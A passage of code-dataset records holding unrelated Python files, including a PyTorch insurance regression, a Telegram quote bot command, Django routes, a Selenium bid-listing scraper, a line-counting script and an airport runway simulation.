line if they take up too much space and expands downwards with a\n scrollbar.\n '''\n qp = QtGui.QPainter()\n qp.begin(self)\n qp.setRenderHint(QtGui.QPainter.Antialiasing, True)\n qp.setPen(QtGui.QColor(30, 30, 30))\n qp.setBrush(QtGui.QColor(240, 240, 240))\n spacer = 10\n widthlimit = max(400, self.width()) \n curx = 0\n cury = 0\n hmaxonrow = 0\n wmax = 0\n for shape in self.available_shapes:\n w = shape.get_max_width()\n if curx + w <= widthlimit:\n shape.draw_at_position(qp, curx, cury)\n curx += w + spacer\n else:\n wmax = max(curx, wmax)\n curx = 0\n cury += spacer + hmaxonrow\n shape.draw_at_position(qp, curx, cury)\n curx = w + spacer\n hmaxonrow = max(hmaxonrow, shape.get_max_height())\n wmax = max(curx, wmax)\n if wmax < 400:\n self.setMinimumWidth(max(100, wmax))\n else:\n self.setMinimumWidth(400)\n self.setMinimumHeight(cury + hmaxonrow)\n qp.end()\n \n def refresh(self, available_shapes):\n '''\n Set the list of shapes to be drawn to available_shapes and call\n self.repaint to update view.\n\n @param available_shapes: list of shapes to draw.\n @type available_shapes: list\n '''\n self.available_shapes = available_shapes\n self.repaint()\n","sub_path":"src/availableshapeswidget.py","file_name":"availableshapeswidget.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595305506","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch.nn.functional as F\nfrom torchvision.datasets.utils import download_url\nfrom torch.utils.data import DataLoader, TensorDataset, random_split\n\n\ndataset_url = \"https://hub.jovian.ml/wp-content/uploads/2020/05/insurance.csv\"\ndata_filename = r\"C:\\\\Users\\\\usuario\\Documents\\\\PROGRMACIÓN\\\\archivosCSV\\\\insurance.csv\"\n#download_url(dataset_url,'.')\ndataframe = pd.read_csv(data_filename,sep=',')\n\nmy_name = \"matilde\"\n\n\ndef 
customize_dataset(dataframe_raw, rand_str): # Tidies up the dataframe for viewing the data\n    dataframe = dataframe_raw.copy(deep=True)\n    # drop some rows\n    dataframe = dataframe.sample(int(0.95*len(dataframe)), random_state=int(ord(rand_str[0])))\n    # scale input\n    dataframe.bmi = dataframe.bmi * ord(rand_str[1])/100.\n    # scale target\n    dataframe.charges = dataframe.charges * ord(rand_str[2])/100.\n    # drop column\n    if ord(rand_str[3]) % 2 == 1:\n        dataframe = dataframe.drop(['region'], axis=1)\n    return dataframe\n\n\n#dataframe=customize_dataset(dataframe_raw, my_name)\nnum_rows=1338\nnum_columns = 7\ninput_cols = ['age', 'sex', 'bmi', 'children', 'smoker','region','charges']\ncategorical_cols=['sex','smoker','region']\noutput_cols = ['bmi','charges']\n\ndef dataframe_to_arrays(dataframe):\n    # Make a copy of the original dataframe\n    dataframe1 = dataframe.copy(deep=True)\n    # Convert non-numeric categorical columns to numbers\n    for col in categorical_cols:\n        dataframe1[col] = dataframe1[col].astype('category').cat.codes\n    # Extract input & outputs as numpy arrays\n    inputs_array = dataframe1[input_cols].to_numpy()\n    targets_array = dataframe1[output_cols].to_numpy()\n    return inputs_array, targets_array\n\ninputs_array, targets_arrays = dataframe_to_arrays(dataframe)\n# pylint: disable=E1101\ninputs = torch.from_numpy(inputs_array)\ntargets = torch.from_numpy(targets_arrays)\ninputs, targets =inputs.float(), targets.float()\n# pylint: enable=E1101\ntargets = targets.squeeze (dim=1)\n\ndataset = TensorDataset (inputs, targets)\nval_percent = 0.15\nval_size = int(num_rows * val_percent)\ntrain_size = int(num_rows-val_size)\ntrain_ds, val_ds = random_split (dataset, [train_size, val_size])\n\n\nbatch_size = 32\ntrain_loader =DataLoader(train_ds,batch_size, shuffle = True)\nval_loader = DataLoader(val_ds, batch_size, shuffle =True)\n\n\ninput_size = len(input_cols)\noutput_size = len (output_cols)\n\n\nclass InsuranceModel (nn.Module):\n    def __init__(self):\n        super().__init__()\n        self.linear = nn.Linear(input_size, output_size)\n    def forward(self ,xb):\n        out = self.linear(xb)\n        return out\n    def training_step (self, batch):\n        inputs, targets = batch\n        out = self (inputs)\n        loss=F.mse_loss(out, targets)\n        return loss\n    def validation_step (self, batch):\n        inputs, targets = batch\n        out = self (inputs)\n        loss= F.mse_loss(out, targets)\n        return {'val_loss': loss.detach()}\n    def validation_epoch_end(self, outputs):\n        batch_losses = [x['val_loss'] for x in outputs]\n        # pylint: disable=E1101\n        epoch_loss = torch.stack(batch_losses).mean() # Combine losses\n        # pylint: enable=E1101\n        return {'val_loss': epoch_loss.item()}\n    def epoch_end(self, epoch, result, num_epochs):\n        # Print result every 20th epoch\n        if (epoch+1) % 20 == 0 or epoch == num_epochs-1:\n            print(\"Epoch [{}], val_loss: {:.4f}\".format(epoch+1, result['val_loss']))\n\nmodel = InsuranceModel()\n\ndef evaluate (model, val_loader):\n    outputs = [model.validation_step(batch) for batch in val_loader]\n    return model.validation_epoch_end(outputs)\ndef fit (epochs, lr, model, train_loader, val_loader, opt_func = torch.optim.SGD):\n    history = []\n    optimizer = opt_func(model.parameters(), lr)\n    for epoch in range (epochs):\n        for batch in train_loader:\n            loss = model.training_step(batch)\n            loss.backward()\n            optimizer.step()\n            optimizer.zero_grad()\n        result = evaluate (model, val_loader)\n        model.epoch_end(epoch, result, epochs)\n        history.append (result)\n    return history\n\nresult0 = evaluate(model, val_loader)\nprint('result0: ', result0)\n\nepochs= 5\nlr = 
0.001\n#history1 = fit (epochs, lr, model, train_loader, val_loader)\n\nepochs= 35\nlr = 0.00001\n#history2 = fit (epochs, lr, model, train_loader, val_loader)\n\nmodel = InsuranceModel()\n\nepochs= 500\nlr = 0.0001\nhistory3 = fit (epochs, lr, model, train_loader, val_loader)\n\nepochs= 7000\nlr = 0.001\n#history4 = fit (epochs, lr, model, train_loader, val_loader)\n\nepochs= 800\nlr = 1e-6\n#history5 = fit (epochs, lr, model, train_loader, val_loader)\n\ndef predict_single(input, target, model):\n    inputs = input.unsqueeze(0)\n    predictions = model(inputs)\n    prediction = predictions[0].detach()\n    print(\"Input:\", input)\n    print(\"Target:\", target)\n    print(\"Prediction:\", prediction)\n\ninput, target = val_ds[10]\npredict_single(input, target, model)\n\n\n\n\n","sub_path":"codigos/tareas/insurance linear/insurance_linear_mse.py","file_name":"insurance_linear_mse.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"635820223","text":"class Solution:\n    def rotate(self, nums: List[int], k: int) -> None:\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        O(t):O(N), O(s):O(1)\n        \"\"\"\n        def reverse(nums, start, end):\n            while start < end:\n                nums[start], nums[end] = nums[end], nums[start]\n                start += 1\n                end -= 1\n            return\n\n        k %= len(nums) # when k exceeds len(nums), the array wraps through full rotations, then rotates by the remainder\n        reverse(nums, 0, len(nums)-1)\n        reverse(nums, 0, k-1)\n        reverse(nums, k, len(nums)-1)\n        return","sub_path":"Array_LinkedList/2 旋转数组.py","file_name":"2 旋转数组.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"274204285","text":"from config import bot\nfrom modules.quotes_api import QuotesApi\nfrom PIL import Image\nfrom modules import pillow_helper\nfrom aiogram import exceptions as tg_excs\nfrom aiogram.types import Message\nfrom ..core import Command\n\n\nclass Q(Command):\n    \"\"\"\n    get a sticker with the message which you are replying to\n    \"\"\"\n    def __init__(self):\n        super().__init__()\n\n    @classmethod\n    async def execute(cls, m: Message):\n        await bot.send_chat_action(m.chat.id, 'upload_photo')\n        if m.reply_to_message and m.reply_to_message.caption:\n            m.reply_to_message.text = m.reply_to_message.caption\n        if m.reply_to_message and not m.reply_to_message.text:\n            await bot.send_message(m.chat.id, 'Сообщение должно быть текстовым')\n            return\n        msg = m.reply_to_message or m\n        if msg.forward_from and msg.forward_from.id:\n            sender = msg.forward_from\n            sender_id = sender.id\n            sender_title = f'{sender.first_name} {sender.last_name}' if sender.last_name else sender.first_name\n            sender_pic = await bot.get_user_profile_photos(sender.id, limit=1)\n        elif msg.forward_sender_name:\n            sender_id = None\n            sender_title = msg.forward_sender_name\n            sender_pic = None\n        else:\n            sender = msg.from_user\n            sender_id = sender.id\n            sender_title = f'{sender.first_name} {sender.last_name}' if sender.last_name else sender.first_name\n            sender_pic = await bot.get_user_profile_photos(sender.id, limit=1)\n\n        if sender_pic and len(sender_pic.photos) > 0:\n            sender_pic = sender_pic.photos[0][-1].file_id\n            sender_pic = await bot.get_file(sender_pic)\n            sender_pic = bot.get_file_url(sender_pic.file_path)\n\n        text = m.reply_to_message.text if m.reply_to_message else m.text\n\n        quote_png = QuotesApi().get_png(text, sender_title, sender_id=sender_id, profile_picture=sender_pic)\n        quote_png.save()\n        with Image.open(quote_png.file_name) as img:\n            size = 
pillow_helper.get_size_by_one_side(img, 512)\n edited_pic = img.resize(size)\n edited_file_name = 'edited_' + quote_png.file_name\n edited_pic.save(edited_file_name)\n try:\n with open(edited_file_name, 'rb') as f:\n await bot.send_document(m.chat.id, f)\n except tg_excs.WrongFileIdentifier:\n await bot.send_message(m.chat.id, 'Произошла ошибка, извините.')\n","sub_path":"bot/user_commands/q.py","file_name":"q.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580789317","text":"from django.conf.urls import patterns, url\nfrom planner import views\n\nurlpatterns = patterns(\n # application urls:\n '',\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^register/$', views.RegisterView.as_view(), name='register'),\n # Example use: login/?next=/register will redirect after logging user in\n url(r'^login/$', views.user_login, name='login'),\n # Example use: logout/?next=/register will redirect after logging user out\n url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page': '/'}, name='logout'),\n url(r'^plan-absence/$', views.PlanAbsenceView.as_view(), name='plan-absence'),\n url(r'^manage-absences/$', views.ManageAbsenceView.as_view(),\n {'mode': 'manager'}, name='manage-absences'),\n url(r'^my-absences/$', views.ManageAbsenceView.as_view(),\n {'mode': 'selfcare'}, name='my-absences'),\n url(r'^save_weekends/$', views.SaveWeekendsView, name='save_weekends'),\n # urls for ajax calls (returning jsons):\n url(r'^user/$', views.UserRestView.as_view(), name='user'),\n url(r'^teams/$', views.TeamRestView.as_view(), name='teams'),\n url(r'^range/$', views.RangeRestView.as_view(), name='range'),\n url(r'^holiday/$', views.HolidayRestView.as_view(), name='holiday'),\n url(r'^absence/$', views.AbsenceRestView.as_view(), name='absence'),\n)\n\n","sub_path":"planner/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388692317","text":"import pandas as pd\nfrom selenium import webdriver\nfrom collections import OrderedDict\n\nurl=\"https://bidplus.gem.gov.in/bidlists\"\n\ndriver=webdriver.Chrome(\"D:\\Padhai\\Softwares\\chromedriver.exe\")\n\ndriver.get(url)\n\nbid_no=[]\nitems=[]\nquantity=[]\ndept=[]\nstart=[]\nend=[]\n\n\nfor i in range(1,11): # find by using x path\n bid_no.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[1]/p[1]/a').text)\n items.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[2]/p[1]/span').text)\n quantity.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[2]/p[2]/span').text)\n dept.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[3]/p[2]').text)\n start.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[4]/p[1]/span').text)\n end.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[4]/p[2]/span').text)\n \nstart_date=[]\nstart_time=[]\nend_date=[]\nend_time=[]\n\nfor item in start:\n start_date.append(item.split()[0])\n start_time.append(item.split()[1] + item.split()[2])\nfor item in end:\n end_date.append(item.split()[0])\n end_time.append(item.split()[1] + item.split()[2]) \n\ncol_name=[\"Bid No\",\"Items\",\"Quantity Required\",\"Dept., Name, Address\",\"Start Date\",\"Start Time\",\"End Date\", \"End 
Time\"]\ncol_data=OrderedDict(zip(col_name,[bid_no,items,quantity,dept,start_date,start_time,end_date,end_time]))\n\ndf = pd.DataFrame(col_data) \ndf.to_csv(\"bid_plus.csv\")","sub_path":"Day 8/bid_plus.py","file_name":"bid_plus.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295700481","text":"\"\"\"Background\nThere is a message that is circulating via public media that claims a reader can easily read a message where the inner\nletters of each words is scrambled, as long as the first and last letters remain the same and the word contains all the\nletters.\n\nAnother example shows that it is quite difficult to read the text where all the letters are reversed rather than\nscrambled.\n\nIn this kata we will make a generator that generates text in a similar pattern, but instead of scrambled or reversed,\nours will be sorted alphabetically\n\nRequirement\nreturn a string where:\n1) the first and last characters remain in original place for each word\n2) characters between the first and last characters must be sorted alphabetically\n3) punctuation should remain at the same place as it started, for example: shan't -> sahn't\n\nAssumptions\n1) words are seperated by single spaces\n2) only spaces separate words, special characters do not, for example: tik-tak -> tai-ktk\n3) special characters do not take the position of the non special characters, for example: -dcba -> -dbca\n4) for this kata puctuation is limited to 4 characters: hyphen(-), apostrophe('), comma(,) and period(.)\n5) ignore capitalisation\n\n\"\"\"\n\n\nimport re\n\n\ndef scramble_words(words):\n\n special = ['-', '.', ',', '\\'']\n result = []\n\n for word in words.split(' '):\n\n special_index = dict([(k,v) for k,v in enumerate(word) if v in special])\n word = re.sub('[,\\'.-]', '', word)\n\n sorted_word = [word[0]] + sorted(word[1:-1]) + [word[-1]] if len(word) > 2 else [word]\n\n for k,v in special_index.items():\n sorted_word.insert(k, v)\n\n result.append(''.join(sorted_word))\n\n return ' '.join(result)\n\n\n\n","sub_path":"Kata/5kyu Typoglycemia Generator.py","file_name":"5kyu Typoglycemia Generator.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"545304947","text":"# -*- coding: utf-8 -*-\n# 有个目录,里面是你自己写过的程序,统计一下你写过多少行代码。包括空行和注释,但是要分别列出来。\n# 思路:https://www.cnblogs.com/chen0427/p/5732245.html\n\nimport glob\nimport os\nimport re\nfrom PIL import Image\n\n\ndef getFiles(dir):\n return glob.glob(os.path.join(dir, '*.py'))\n\n\ndef sourceStat(filename):\n d = {'totalline':0,'blankline':0,'commentline':0,'codeline':0}\n with open(filename, 'r', encoding='utf-8') as f:\n # readlines会自动去掉文末的一行空行\n lines = list(map(lambda x: x.rstrip('\\n').strip(), f.readlines()))\n flag_comment = False\n for line in lines:\n if line.startswith(\"'''\") or line.startswith('\"\"\"'):\n flag_comment = not flag_comment\n if not flag_comment and not line.startswith(\"'''\") and not line.startswith('\"\"\"'):\n if not line:\n d['blankline'] += 1\n continue\n if line.startswith('#'):\n d['commentline'] += 1\n continue\n # 既非三引号注释行,又非空白行,也不是#号注释行,排除后剩下就是代码行\n d['codeline'] += 1\n else:\n d['commentline'] += 1\n\n d['totalline'] = d['blankline']+d['commentline']+d['codeline']\n return d\n\n\nif __name__ == \"__main__\":\n # dir = r'D:\\Program Files\\Python\\Python37\\Lib\\site-packages\\PIL'\n dir = r'.\\code'\n 
d_sum={'totalline':0,'blankline':0,'commentline':0,'codeline':0}\n for filename in getFiles(dir):\n file=os.path.basename(filename)\n d=sourceStat(filename)\n print('{0}文件的总行数为:{1},空白行数:{2},注释行数:{3},代码行数:{4}'.format(file,d['totalline'],d['blankline'],d['commentline'],d['codeline']))\n d_sum['totalline'] += d['totalline']\n d_sum['blankline'] += d['blankline']\n d_sum['commentline'] += d['commentline']\n d_sum['codeline'] += d['codeline']\n print('所有文件的总行数为:{0},空白行数:{1},注释行数:{2},代码行数:{3}'.format(d_sum['totalline'],d_sum['blankline'],d_sum['commentline'],d_sum['codeline']))\n","sub_path":"answer/0007/0007.py","file_name":"0007.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198790568","text":"'''\nCreated on Feb 10, 2013\n\n@author: mkiyer\n'''\nfrom base import SANGER_FORMAT, SOLEXA_FORMAT, ILLUMINA_FORMAT\n\n# FASTQC constants\nSANGER_ENCODING = \"Sanger / Illumina 1.9\"\nSOLEXA_ENCODING = \"Illumina < 1.3\"\nILLUMINA_13_ENCODING = \"Illumina 1.3\"\nILLUMINA_15_ENCODING = \"Illumina 1.5\"\nENCODING_VALUES = (SANGER_ENCODING, \n SOLEXA_ENCODING, \n ILLUMINA_13_ENCODING, \n ILLUMINA_15_ENCODING)\nENCODING_TO_QUAL_FORMAT = {SANGER_ENCODING: SANGER_FORMAT,\n SOLEXA_ENCODING: SOLEXA_FORMAT,\n ILLUMINA_13_ENCODING: ILLUMINA_FORMAT,\n ILLUMINA_15_ENCODING: ILLUMINA_FORMAT}\n\ndef get_most_common_sequence_length(fastqc_data_file):\n fileh = open(fastqc_data_file)\n for line in fileh:\n if line.startswith(\">>Sequence Length Distribution\"):\n break\n fileh.next()\n most_common_length = None\n most_common_count = 0\n for line in fileh:\n if line.startswith(\"#\"):\n continue\n if line.startswith(\">>END_MODULE\"):\n break\n fields = line.strip().split('\\t')\n length = fields[0]\n count = float(fields[1])\n if (count >= most_common_count):\n most_common_length = length\n most_common_count = count\n fileh.close()\n lengths = map(int, most_common_length.split('-'))\n return int(round(float(sum(lengths)) / len(lengths)))\n\ndef get_sequence_length(fastqc_data_file):\n for line in open(fastqc_data_file):\n if not line: continue\n line = line.strip()\n if line.startswith(\"Sequence length\"):\n return int(line.split()[-1])\n\ndef get_total_sequences(fastqc_data_file):\n for line in open(fastqc_data_file):\n if not line: continue\n line = line.strip()\n if line.startswith(\"Total Sequences\"):\n return int(line.split()[-1])\n\ndef get_encoding(fastqc_data_file):\n for line in open(fastqc_data_file):\n if not line: continue\n line = line.strip()\n if line.startswith(\"Encoding\"):\n return line.split(\"\\t\")[-1]","sub_path":"oncoseq/rnaseq/lib/fastqc.py","file_name":"fastqc.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216708061","text":"import re\r\nimport operator\r\nimport os\r\nimport sys \r\nfrom PyQt4.QtCore import * \r\nfrom PyQt4.QtGui import *\r\nimport sys\r\nfrom random import randint\r\nfrom Plane import Plane\r\nimport time\r\n#from queue import PriorityQueue\r\nimport ModelImpl \r\nimport re\r\nimport operator\r\nimport os\r\nimport sys \r\nfrom PyQt4 import QtCore\r\nfrom PyQt4.QtCore import QObject, pyqtSignal\r\nfrom radar import Ui_RadarWidget\r\nlist_of_names = ['Burkina Air', 'TAROM', 'MoldAir', 'Aeroflot']\r\n\r\nclass Simulation(QObject):\r\n\t\r\n\ttick=4*[QtCore.pyqtSignal(int, name=\"changed\")]\r\n\theader = ['Nume', 'Prioritate']\r\n\tdef __init__(self, maxNumber, timerTick, 
numPiste):\r\n\t\tsuper(Simulation, self).__init__()\r\n\t\tself.running = 0\r\n\t\tself.currentNumber = 0\r\n\t\tself.maxNumber = maxNumber\r\n\t\tself.timerTick = timerTick\r\n\t\tself.listOfAirplanes = numPiste * [None]\r\n\t\tself.numPiste = numPiste\r\n\t\tself.sosiriIn = []\r\n\t\tself.plecariIn = []\r\n\t\tself.plecariModel = None\r\n\t\tself.sosiriModel = None\r\n\t\tself.__generateInitialData(self.maxNumber)\r\n\t\tself.ui = None\r\n\t\t\r\n\tdef __generateInitialData(self, nr):\r\n\t\ttoGenerate = randint(0, nr)\r\n\t\tself.currentNumber += toGenerate\r\n\t\tif self.plecariModel is not None:\r\n\t\t\tself.plecariModel.triggerDataChanging()\r\n\t\t\tself.sosiriModel.triggerDataChanging()\r\n\t\t\t\r\n\r\n\t\t# generate exactly toGenerate planes so currentNumber stays in sync with the queues\r\n\t\tfor i in range(toGenerate):\r\n\t\t\tplane = Plane.generateRandomPlane()\r\n\t\t\tif plane.status == 0:\r\n\t\t\t\tself.plecariIn.append(plane)\r\n\t\t\telse:\r\n\t\t\t\tself.sosiriIn.append(plane)\r\n\t\tself.plecariIn.sort()\r\n\t\tself.sosiriIn.sort()\r\n\t\tif self.plecariModel is not None:\r\n\t\t\tself.plecariModel.triggerDataChanged()\r\n\t\t\tself.sosiriModel.triggerDataChanged()\r\n\t\t\r\n\t\t\r\n\tdef __bindUiToModel(self):\r\n\t\tif self.ui is not None:\r\n\t\t\tfor i in range(self.numPiste):\r\n\t\t\t\tairplane = self.listOfAirplanes[i]\r\n\t\t\t\tif airplane is not None:\r\n\t\t\t\t\tgetattr(self.ui, 'runway' + str(i)).setValue(int(airplane.getPercentage() * 100))\r\n\t\t\t\telse:\r\n\t\t\t\t\tgetattr(self.ui, 'runway' + str(i)).setValue(0)\r\n\t\t\tself.ui.labelSosiri.setText(self.ui.labelSosiri.text() + ' ' + str(len(self.sosiriIn)))\r\n\t\t\tself.ui.labelPlecari.setText(self.ui.labelPlecari.text() + ' ' + str(len(self.plecariIn)))\r\n\r\n\tdef setGraphicalModel(self, ui):\r\n\t\tself.ui = ui\r\n\t\t# NOTE: MyTableModel is referenced but never imported here; it presumably lives in the ModelImpl module imported above\r\n\t\tself.plecariModel = MyTableModel(self.plecariIn, Simulation.header,['name', 'priority'], ui.tabelPlecari) \r\n\t\tself.sosiriModel = MyTableModel(self.sosiriIn, Simulation.header,['name', 'priority'], ui.tabelSosiri) \r\n\t\tui.tabelPlecari.setModel(self.plecariModel)\r\n\t\tui.tabelSosiri.setModel(self.sosiriModel)\r\n#\t\tfor i in range(self.numPiste):\r\n#\t\t\ttick[i].connect(getattr(self.ui, 'runway' + str(i)).setValue)\r\n\t\tself.__bindUiToModel()\r\n\t\tself.ui.buttonStart.clicked.connect(self.setRunning)\r\n\t\tself.ui.buttonStop.clicked.connect(self.setStopped)\r\n\tdef setStopped(self):\r\n\t\tself.running = 2\r\n\tdef setRunning(self):\r\n\t\tself.running = 1\r\n\tdef startInit(self):\r\n\t\tself.running = 2\r\n\t\tself.__runSimulation()\r\n\tdef __consumePlane(self):\r\n\t\tfreeSpots = [x for x in self.listOfAirplanes if x is None]\r\n\t\tif len(freeSpots) > 0:\r\n\t\t\tindex = self.listOfAirplanes.index(None)\r\n\t\telse:\r\n\t\t\treturn\r\n\t\tprint('Free spot at ' + str(index))\r\n\t\tif len(self.plecariIn) > 0:\r\n\t\t\tdepPlane = self.plecariIn[0]\r\n\t\telse:\r\n\t\t\tdepPlane = None\r\n\t\tif len(self.sosiriIn) > 0:\r\n\t\t\tarrPlane = self.sosiriIn[0]\r\n\t\telse:\r\n\t\t\tarrPlane = None\r\n\t\tif (arrPlane is None and depPlane is None):\r\n\t\t\treturn\r\n\t\tif arrPlane is None or (depPlane is not None and depPlane.priority < arrPlane.priority):\r\n\t\t\tself.listOfAirplanes[index] = depPlane\r\n\t\t\tself.plecariIn.pop(0)\r\n\t\telif depPlane is None or (arrPlane is not None and depPlane.priority > arrPlane.priority):\r\n\t\t\tself.listOfAirplanes[index] = arrPlane\r\n\t\t\tself.sosiriIn.pop(0)\r\n\t\telse:\r\n\t\t\tif len(self.sosiriIn) > len(self.plecariIn):\r\n\t\t\t\tself.listOfAirplanes[index] = 
arrPlane\r\n\t\t\t\tself.sosiriIn.pop(0)\r\n\t\t\t\tprint(str(arrPlane) + ' arriving on ' + str(index))\r\n\t\t\telse:\r\n\t\t\t\t# equal priorities and at least as many departures waiting: service a departure\r\n\t\t\t\tself.listOfAirplanes[index] = depPlane\r\n\t\t\t\tself.plecariIn.pop(0)\r\n\t\t\t\tprint(str(depPlane) + ' departing from ' + str(index))\r\n\tdef __checkForCompletion(self):\r\n\t\tfor i in range(0, len(self.listOfAirplanes)):\r\n\t\t\tif self.listOfAirplanes[i] is not None:\r\n\t\t\t\t# status 0 is a departure (plecari), so its take-off timer counts down; arrivals count down their landing timer\r\n\t\t\t\tif self.listOfAirplanes[i].status == 0:\r\n\t\t\t\t\tself.listOfAirplanes[i].takeOffTime-=1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.listOfAirplanes[i].landingTime-=1\r\n\t\t\t\tif self.listOfAirplanes[i].takeOffTime <= 0 or self.listOfAirplanes[i].landingTime<=0:\r\n\t\t\t\t\tprint(str(self.listOfAirplanes[i]) + ' over for rw ' + str(i))\r\n\t\t\t\t\tself.listOfAirplanes[i] = None\r\n\t\t\t\t\t\r\n\tdef __runSimulation(self):\r\n\t\twhile self.running != 0:\r\n\t\t\tif self.running == 2:\r\n\t\t\t\ttime.sleep(self.timerTick)  # avoid a hot busy-wait while paused\r\n\t\t\t\tcontinue\r\n\t\t\tif (self.currentNumber < self.maxNumber):\r\n\t\t\t\tself.__generateInitialData(self.maxNumber - self.currentNumber)\r\n\t\t\tself.__checkForCompletion()\r\n\t\t\tself.__consumePlane()\r\n\t\t\tself.__printModel()\r\n\t\t\ttime.sleep(self.timerTick)\r\n\tdef stopInit(self):\r\n\t\tself.running = 0\r\n\tdef __printModel(self):\r\n\t\tfor i in range(0, len(self.listOfAirplanes)):\r\n\t\t\tif self.listOfAirplanes[i] is not None:\r\n\t\t\t\tprint ('RW:' + str(i) + ' --- ' + self.listOfAirplanes[i].name + ' --- ' + str(int(self.listOfAirplanes[i].getPercentage() * 100)) + '%')\r\n\t\t\telse:\r\n\t\t\t\tprint ('RW:' + str(i) + ' --- is free')\r\n\r\n","sub_path":"Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"436323917","text":"# Copyright (C) 2008 One Laptop Per Child\n# Copyright (C) 2010 Sugar Labs\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nimport logging\nimport math\nimport hashlib\nfrom gettext import gettext as _\n\nimport gobject\nimport gtk\nimport hippo\n\nfrom sugar.graphics import style\n\nfrom jarabe.model import bundleregistry\nfrom jarabe.desktop.grid import Grid\n\n_logger = logging.getLogger('ActivityLayout')\n\n_ACTIVITY_SCREEN_PERCENTAGE = 35\n\n_CELL_SIZE = 4\n_BASE_SCALE = 1000\n_INTERMEDIATE_B = (style.STANDARD_ICON_SIZE + style.SMALL_ICON_SIZE) / 2\n_INTERMEDIATE_A = (style.STANDARD_ICON_SIZE + _INTERMEDIATE_B) / 2\n_INTERMEDIATE_C = (_INTERMEDIATE_B + style.SMALL_ICON_SIZE) / 2\n_ICON_SIZES = [style.MEDIUM_ICON_SIZE, style.STANDARD_ICON_SIZE,\n _INTERMEDIATE_A, _INTERMEDIATE_B, _INTERMEDIATE_C,\n style.SMALL_ICON_SIZE]\n\n\nclass ActivityLayout(gobject.GObject, hippo.CanvasLayout):\n \"\"\"Base class of the different layout types.\"\"\"\n\n __gtype_name__ = 'ActivityLayout'\n\n def __init__(self):\n gobject.GObject.__init__(self)\n self.box = None\n self.fixed_positions = {}\n\n def do_set_box(self, box):\n self.box = box\n\n def do_get_height_request(self, for_width):\n return 0, (gtk.gdk.screen_height() - style.GRID_CELL_SIZE) * _ACTIVITY_SCREEN_PERCENTAGE / 100\n\n def do_get_width_request(self):\n return 0, gtk.gdk.screen_width()\n\n def compare_activities(self, icon_a, icon_b):\n return 0\n\n def append(self, icon, locked=False):\n if not hasattr(type(icon), 'fixed_position'):\n logging.debug('Icon without fixed_position: %r', icon)\n return\n\n icon.props.size = max(icon.props.size, style.STANDARD_ICON_SIZE)\n\n relative_x, relative_y = icon.fixed_position\n if relative_x < 0 or relative_y < 0:\n logging.debug('Icon out of bounds: %r', icon)\n return\n\n min_width_, width = self.box.get_width_request()\n min_height_, height = self.box.get_height_request(width)\n self.fixed_positions[icon] = \\\n (int(relative_x * _BASE_SCALE / float(width)),\n int(relative_y * _BASE_SCALE / float(height)))\n\n def remove(self, icon):\n if icon in self.fixed_positions:\n del self.fixed_positions[icon]\n\n def move_icon(self, icon, x, y, locked=False):\n if icon not in self.box.get_children():\n raise ValueError('Child not in box.')\n\n if not(hasattr(icon, 'get_bundle_id') and hasattr(icon, 'get_version')):\n logging.debug('Not an activity icon %r', icon)\n return\n\n min_width_, width = self.box.get_width_request()\n min_height_, height = self.box.get_height_request(width)\n registry = bundleregistry.get_registry()\n registry.set_bundle_position(\n icon.get_bundle_id(), icon.get_version(),\n x * width / float(_BASE_SCALE),\n y * height / float(_BASE_SCALE))\n self.fixed_positions[icon] = (x, y)\n\n def do_allocate(self, x, y, width, height, req_width, req_height,\n origin_changed):\n raise NotImplementedError()\n\n def allow_dnd(self):\n return False\n\nclass RandomActivityLayout(ActivityLayout):\n \"\"\"Lay out icons randomly; try to nudge them around to resolve overlaps.\"\"\"\n\n __gtype_name__ = 'RandomActivityLayout'\n\n icon_name = 'view-freeform'\n \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n\n key = 'random-layout'\n \"\"\"String used in profile to represent this view.\"\"\"\n\n # TRANS: label for the 